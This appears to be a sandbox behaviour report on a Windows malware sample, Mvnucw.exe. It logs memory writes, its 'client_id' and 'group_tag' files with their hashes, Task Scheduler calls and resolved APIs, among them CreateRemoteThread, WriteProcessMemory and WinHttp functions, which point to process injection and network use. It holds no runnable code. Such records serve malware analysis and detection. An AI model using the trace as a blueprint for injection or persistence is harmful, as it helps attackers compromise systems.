| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019288, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 25 |
|
4 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019010, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 23 |
|
3 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019018, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019020, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019028, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019030, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019038, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019040, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 24 |
|
2 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019048, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 20 |
|
2 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019050, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019058, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019060, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019068, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019070, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 28 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019078, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 16 |
|
3 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019080, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019088, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019090, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019098, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400190a0, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400190a8, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400190b0, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400190b8, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019000, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019298, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400192a0, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400190c8, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400190d0, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400190d8, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400190e0, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400190e8, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x1400190f8, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019100, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019108, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019110, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019118, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019120, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019128, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019130, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019138, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019140, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 26 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019148, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019150, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019160, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019168, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019170, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019178, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x140019180, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x7fffffd6010, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x282830, size = 8 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x20010, size = 116 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x282848, size = 16 |
|
1 | |
| Modify Memory | #7: c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe | 0xb6c | address = 0x70000, size = 16 |
|
1 |
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\adu0vk iwa5kls\appdata\roaming\winapp\client_id | 0.10 KB (106 bytes) |
MD5:
c9e2607b0faa2a1d36e4ebc553f41698
SHA1: b8c4d60f72d70bbf8ce3ff1e16f7fe659cda9821 SHA256: fa6c18a934575a42088ed671a0bb0de633b8f00e1226a38596f6b625c1455e3e |
|
|
| c:\users\adu0vk iwa5kls\appdata\roaming\winapp\group_tag | 0.01 KB (12 bytes) |
MD5:
20d4581a76fac9a75b1300485c2c2ce4
SHA1: 56f0501fc59c0a9f5f6967cd7f03e5d4f5b8adf6 SHA256: 60e79d113cf1adb6e594a3ab1eef644f274cfaf004b576b6592da7aa6119b67d |
|
|
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | F5078F32-C551-11D3-89B9-0000F81FE221 | 2933BF81-7B36-11D2-B20E-00C04F983E60 | cls_context = CLSCTX_INPROC_SERVER |
|
4 | |
| Execute | TaskScheduler | ITaskService | method_name = Connect |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = GetFolder, path = \, new_interface = ITaskFolder |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | client_id | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aDU0VK IWA5kLS\AppData\Roaming\client_id | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | client_id | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | config.conf | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | group_tag | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aDU0VK IWA5kLS\AppData\Roaming\group_tag | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | group_tag | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | client_id | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | client_id | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | Modules\ |
|
1 | ||
| Get Info | Modules\ | type = file_attributes |
|
1 | |
| Get Info | Modules\ | type = file_attributes |
|
1 | |
| Read | client_id | size = 106, size_out = 106 |
|
1 | |
| Write | client_id | size = 106 |
|
1 | |
| Write | group_tag | size = 12 |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x0 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x0 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x0 |
|
1 | |
| Load | ole32.dll | base_address = 0x0 |
|
1 | |
| Load | OLEAUT32.dll | base_address = 0x0 |
|
1 | |
| Load | WINHTTP.dll | base_address = 0x0 |
|
1 | |
| Load | WS2_32.dll | base_address = 0x0 |
|
1 | |
| Load | kernel32.dll | base_address = 0x77320000 |
|
2 | |
| Load | ADVAPI32.dll | base_address = 0x7fefdb00000 |
|
1 | |
| Load | ole32.dll | base_address = 0x7fefede0000 |
|
1 | |
| Load | CRYPT32.dll | base_address = 0x7fefd6f0000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x7feff2b0000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x77540000 |
|
1 | |
| Load | IPHLPAPI.dll | base_address = 0x7fefb7e0000 |
|
1 | |
| Load | USERENV.dll | base_address = 0x7fefc840000 |
|
1 | |
| Load | Ncrypt.dll | base_address = 0x7fefcf20000 |
|
1 | |
| Load | Bcrypt.dll | base_address = 0x7fefcef0000 |
|
1 | |
| Get Handle | private_0x0000000140000000 | base_address = 0x140000000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77320000 |
|
1 | |
| Get Filename | WS2_32.dll | process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe, size = 512 |
|
1 | |
| Get Filename | WS2_32.dll | process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe, size = 260 |
|
3 | |
| Get Address | function = _fmode, ordinal = 0, address_out = 0x20017 |
|
1 | ||
| Get Address | function = _commode, ordinal = 0, address_out = 0x20019 |
|
1 | ||
| Get Address | function = ?terminate@@YAXXZ, ordinal = 0, address_out = 0x20022 |
|
1 | ||
| Get Address | function = __setusermatherr, ordinal = 0, address_out = 0x20021 |
|
1 | ||
| Get Address | function = memcpy, ordinal = 0, address_out = 0x20017 |
|
1 | ||
| Get Address | function = _wtoi, ordinal = 0, address_out = 0x20016 |
|
1 | ||
| Get Address | function = _amsg_exit, ordinal = 0, address_out = 0x2001b |
|
1 | ||
| Get Address | function = tolower, ordinal = 0, address_out = 0x20018 |
|
1 | ||
| Get Address | function = rand, ordinal = 0, address_out = 0x20015 |
|
1 | ||
| Get Address | function = ??_V@YAXPEAX@Z, ordinal = 0, address_out = 0x2001f |
|
1 | ||
| Get Address | function = _itow, ordinal = 0, address_out = 0x20016 |
|
1 | ||
| Get Address | function = _vsnprintf, ordinal = 0, address_out = 0x2001b |
|
1 | ||
| Get Address | function = exit, ordinal = 0, address_out = 0x20015 |
|
1 | ||
| Get Address | function = __wgetmainargs, ordinal = 0, address_out = 0x2001f |
|
1 | ||
| Get Address | function = __C_specific_handler, ordinal = 0, address_out = 0x20025 |
|
1 | ||
| Get Address | function = _XcptFilter, ordinal = 0, address_out = 0x2001c |
|
1 | ||
| Get Address | function = _exit, ordinal = 0, address_out = 0x20016 |
|
1 | ||
| Get Address | function = _cexit, ordinal = 0, address_out = 0x20017 |
|
1 | ||
| Get Address | function = _wcmdln, ordinal = 0, address_out = 0x20018 |
|
1 | ||
| Get Address | function = _initterm, ordinal = 0, address_out = 0x2001a |
|
1 | ||
| Get Address | function = _CxxThrowException, ordinal = 0, address_out = 0x20023 |
|
1 | ||
| Get Address | function = memset, ordinal = 0, address_out = 0x20017 |
|
1 | ||
| Get Address | function = ??1type_info@@UEAA@XZ, ordinal = 0, address_out = 0x20026 |
|
1 | ||
| Get Address | function = srand, ordinal = 0, address_out = 0x20016 |
|
1 | ||
| Get Address | function = _vsnwprintf, ordinal = 0, address_out = 0x2001c |
|
1 | ||
| Get Address | function = ??2@YAPEAX_K@Z, ordinal = 0, address_out = 0x2001f |
|
1 | ||
| Get Address | function = _time64, ordinal = 0, address_out = 0x20018 |
|
1 | ||
| Get Address | function = _localtime64, ordinal = 0, address_out = 0x2001d |
|
1 | ||
| Get Address | function = ??3@YAXPEAX@Z, ordinal = 0, address_out = 0x2001e |
|
1 | ||
| Get Address | function = wcsftime, ordinal = 0, address_out = 0x20019 |
|
1 | ||
| Get Address | function = __set_app_type, ordinal = 0, address_out = 0x2001f |
|
1 | ||
| Get Address | function = memcmp, ordinal = 0, address_out = 0x20017 |
|
1 | ||
| Get Address | function = UnhandledExceptionFilter, ordinal = 0, address_out = 0x20029 |
|
1 | ||
| Get Address | function = RtlLookupFunctionEntry, ordinal = 0, address_out = 0x20027 |
|
1 | ||
| Get Address | function = TerminateProcess, ordinal = 0, address_out = 0x20021 |
|
1 | ||
| Get Address | function = LocalFree, ordinal = 0, address_out = 0x2001a |
|
1 | ||
| Get Address | function = RtlCaptureContext, ordinal = 0, address_out = 0x20022 |
|
1 | ||
| Get Address | function = GetCurrentProcess, ordinal = 0, address_out = 0x20022 |
|
1 | ||
| Get Address | function = RtlVirtualUnwind, ordinal = 0, address_out = 0x20021 |
|
1 | ||
| Get Address | function = GetSystemTimeAsFileTime, ordinal = 0, address_out = 0x20028 |
|
1 | ||
| Get Address | function = GetCurrentProcessId, ordinal = 0, address_out = 0x20024 |
|
1 | ||
| Get Address | function = GetCurrentThreadId, ordinal = 0, address_out = 0x20023 |
|
1 | ||
| Get Address | function = GetTickCount, ordinal = 0, address_out = 0x2001d |
|
1 | ||
| Get Address | function = QueryPerformanceCounter, ordinal = 0, address_out = 0x20028 |
|
1 | ||
| Get Address | function = GetModuleHandleW, ordinal = 0, address_out = 0x20021 |
|
1 | ||
| Get Address | function = SetUnhandledExceptionFilter, ordinal = 0, address_out = 0x2002c |
|
1 | ||
| Get Address | function = GetStartupInfoW, ordinal = 0, address_out = 0x20020 |
|
1 | ||
| Get Address | function = GetFullPathNameW, ordinal = 0, address_out = 0x20021 |
|
1 | ||
| Get Address | function = lstrlenW, ordinal = 0, address_out = 0x20019 |
|
1 | ||
| Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x2001d |
|
1 | ||
| Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x2001f |
|
1 | ||
| Get Address | function = GetLastError, ordinal = 0, address_out = 0x2001d |
|
1 | ||
| Get Address | function = LoadLibraryW, ordinal = 0, address_out = 0x2001d |
|
1 | ||
| Get Address | function = Sleep, ordinal = 0, address_out = 0x20016 |
|
1 | ||
| Get Address | function = AdjustTokenPrivileges, ordinal = 0, address_out = 0x20026 |
|
1 | ||
| Get Address | function = CoInitializeSecurity, ordinal = 0, address_out = 0x20025 |
|
1 | ||
| Get Address | function = CoInitializeEx, ordinal = 0, address_out = 0x2001f |
|
1 | ||
| Get Address | function = 0, ordinal = 4, address_out = 0x20000 |
|
1 | ||
| Get Address | function = 0, ordinal = 6, address_out = 0x20000 |
|
1 | ||
| Get Address | function = 0, ordinal = 8, address_out = 0x20000 |
|
1 | ||
| Get Address | function = 0, ordinal = 9, address_out = 0x20000 |
|
1 | ||
| Get Address | function = 0, ordinal = 2, address_out = 0x20000 |
|
1 | ||
| Get Address | function = WinHttpSendRequest, ordinal = 0, address_out = 0x20023 |
|
1 | ||
| Get Address | function = WinHttpSetTimeouts, ordinal = 0, address_out = 0x20023 |
|
1 | ||
| Get Address | function = WinHttpSetOption, ordinal = 0, address_out = 0x20021 |
|
1 | ||
| Get Address | function = WinHttpConnect, ordinal = 0, address_out = 0x2001f |
|
1 | ||
| Get Address | function = WinHttpCloseHandle, ordinal = 0, address_out = 0x20023 |
|
1 | ||
| Get Address | function = WinHttpQueryHeaders, ordinal = 0, address_out = 0x20024 |
|
1 | ||
| Get Address | function = WinHttpCrackUrl, ordinal = 0, address_out = 0x20020 |
|
1 | ||
| Get Address | function = WinHttpReadData, ordinal = 0, address_out = 0x20020 |
|
1 | ||
| Get Address | function = WinHttpOpenRequest, ordinal = 0, address_out = 0x20023 |
|
1 | ||
| Get Address | function = WinHttpOpen, ordinal = 0, address_out = 0x2001c |
|
1 | ||
| Get Address | function = WinHttpQueryDataAvailable, ordinal = 0, address_out = 0x2002a |
|
1 | ||
| Get Address | function = WinHttpReceiveResponse, ordinal = 0, address_out = 0x20027 |
|
1 | ||
| Get Address | function = getaddrinfo, ordinal = 0, address_out = 0x2001c |
|
1 | ||
| Get Address | function = 0, ordinal = 115, address_out = 0x20000 |
|
1 | ||
| Get Address | function = 0, ordinal = 57, address_out = 0x20000 |
|
1 | ||
| Get Address | function = 0, ordinal = 116, address_out = 0x20000 |
|
1 | ||
| Get Address | function = freeaddrinfo, ordinal = 0, address_out = 0x2001d |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThread, address_out = 0x77336580 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x7732d130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpW, address_out = 0x7733d9c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrlenW, address_out = 0x77333ec0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFullPathNameW, address_out = 0x773376e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileW, address_out = 0x7733bd80 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindResourceW, address_out = 0x77339b50 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibrary, address_out = 0x77336620 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadResource, address_out = 0x773398c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleW, address_out = 0x77343730 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileTime, address_out = 0x77333880 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcpynW, address_out = 0x7736bab0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x77342dd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x7733bd60 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LockResource, address_out = 0x77328720 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x77336f70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileW, address_out = 0x77331910 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileTime, address_out = 0x77324f80 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x77337070 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpA, address_out = 0x77381230 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesW, address_out = 0x773337a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryW, address_out = 0x7732ad70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x77342b20 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SignalObjectAndWait, address_out = 0x77392c90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetEvent, address_out = 0x77333f00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateRemoteThread, address_out = 0x7736c4f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = OpenProcess, address_out = 0x7733cad0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualFreeEx, address_out = 0x7736bb90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadProcessMemory, address_out = 0x7736bdc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x7736bca0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualProtectEx, address_out = 0x7736bb70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualAllocEx, address_out = 0x7736bbd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ResetEvent, address_out = 0x7732d9a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetExitCodeThread, address_out = 0x77331130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x77335290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DuplicateHandle, address_out = 0x77335d10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteProcessMemory, address_out = 0x7736bad0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ResumeThread, address_out = 0x773313a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateMutexW, address_out = 0x773313c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LocalFree, address_out = 0x773347a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcpyW, address_out = 0x7736e0d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileW, address_out = 0x7732ad90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetCurrentDirectoryW, address_out = 0x7733cab0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnterCriticalSection, address_out = 0x77592fc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MoveFileW, address_out = 0x773af7f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x77382040 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetStartupInfoW, address_out = 0x77338070 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleFileNameW, address_out = 0x77337700 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileAttributesW, address_out = 0x7733bdd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77593000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Sleep, address_out = 0x77342b70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x773364e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount, address_out = 0x77342b00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MoveFileExW, address_out = 0x77323060 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessW, address_out = 0x77341bb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempFileNameW, address_out = 0x7736c030 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpiW, address_out = 0x77331930 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileW, address_out = 0x77331870 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x77331500 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x773435a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x77331150 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersion, address_out = 0x773301d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x77342f80 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x7732d910 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcess, address_out = 0x77335cf0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x77333f40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessId, address_out = 0x77335a50 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrlenA, address_out = 0x7733caf0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x773b9330 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x77339b70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentThreadId, address_out = 0x77333ee0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x77336500 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x773365e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WideCharToMultiByte, address_out = 0x773435f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x77335b50 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Process32FirstW, address_out = 0x77321e00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Process32NextW, address_out = 0x773220f0 |
|
1 | |
